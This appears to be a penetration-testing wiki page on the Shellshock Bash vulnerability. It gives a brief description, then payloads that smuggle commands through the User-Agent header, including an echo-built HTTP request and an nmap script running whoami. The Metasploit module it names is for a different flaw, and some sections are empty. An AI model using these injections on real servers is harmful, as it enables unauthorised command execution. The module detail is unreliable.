Shellshock (CVE-2014-6271)

Description

Shellshock refers to a family of vulnerabilities in the Bash shell (dating back to version 1.3) that enable attackers to execute arbitrary commands remotely through Bash. This can lead to unauthorized remote access to the target system, often achieved via a reverse shell. The vulnerability was discovered by Stéphane Chazelas on September 12, 2014, and publicly disclosed on September 24, 2014.

Bash (Bourne Again Shell) is a *Nix shell developed as part of the GNU project and is the default shell for most Linux distributions.

The flaw lies in Bash's handling of environment variables. Specifically, Bash incorrectly executes trailing commands following a specific sequence of characters: () {:;};.

The vulnerability primarily impacts Linux systems, as Windows does not use Bash (it is not a *Nix-based operating system).

Exploitation

Apache web servers configured to run CGI (Common Gateway Interface) scripts or .sh scripts are particularly vulnerable. CGI scripts are used by Apache to execute commands on the Linux system, with the output returned to the client.

To exploit Shellshock, an attacker needs to identify an input vector or script that interacts with Bash. In the case of an Apache server, legitimate CGI scripts accessible via the web server can be used. When a CGI script is executed, the server spawns a new process and runs the script with Bash, creating an opportunity for exploitation.

The vulnerability can be exploited both manually and automatically using tools like the Metasploit Framework (MSF), which includes modules specifically designed for Shellshock exploitation.

Example

Manual exploitation

CGI script identification

Payload

We need to modify User-Agent variable and send it to the web server using the client we want.

User-Agent: () { :;}; echo 'is vulnerable ?'

Echo

echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo 'is vulnerable'\r\nHost: target\r\nConnection: close\r\n\r\n"

Nmap

nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd=/usr/bin/whoami <target>

Burpsuite

Msfconsole

The following metasploit script can also be used for exploiting shellshock vulnerability.

use exploit/multi/http/php_cgi_arg_injection

PreviousRCENextWeb applications

Last updated